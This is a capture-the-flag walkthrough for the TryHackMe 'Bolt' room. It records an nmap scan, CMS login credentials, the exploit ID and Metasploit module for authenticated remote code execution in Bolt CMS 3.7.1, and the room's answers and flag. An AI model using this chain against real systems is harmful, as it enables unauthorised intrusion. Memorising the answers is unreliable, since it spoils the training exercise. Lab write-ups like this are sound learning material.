Room Link : https://tryhackme.com/r/room/bolt
STEP1
nmap -p- -sSV 10.10.174.222 -Pn -T4 -A
FINDING
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http (PHP 7.2.32-1)
What port number has a web server with a CMS running?
8000
-------------------------------------------------------------------------------------------------
STEP2
http://10.10.174.222:8000/
FINDING
What is the username we can find in the CMS?
bolt
What is the password we can find for the username?
boltadmin123
-------------------------------------------------------------------------------------------------
STEP3
I tried to search on Google for the Bolt CMS default login page address.
ref : https://docs.boltcms.io/5.2/manual/login
http://10.10.174.222:8000/bolt
login
bolt -- boltadmin123
FINDING
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
Bolt 3.7.1
There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
48296
ref : https://www.exploit-db.com/exploits/48296
-------------------------------------------------------------------------------------------------
STEP4
service postgresql start && msfconsole -q
search exploit bolt
FINDING
Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
exploit/unix/webapp/bolt_authenticated_rce
-------------------------------------------------------------------------------------------------
STEP5
Set LHOST, LPORT, RHOST, USERNAME and PASSWORD in msfconsole before running the exploit.
cd /home
cat flag.txt
FINDING
Look for flag.txt inside the machine.
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
-------------------------------------------------------------------------------------------------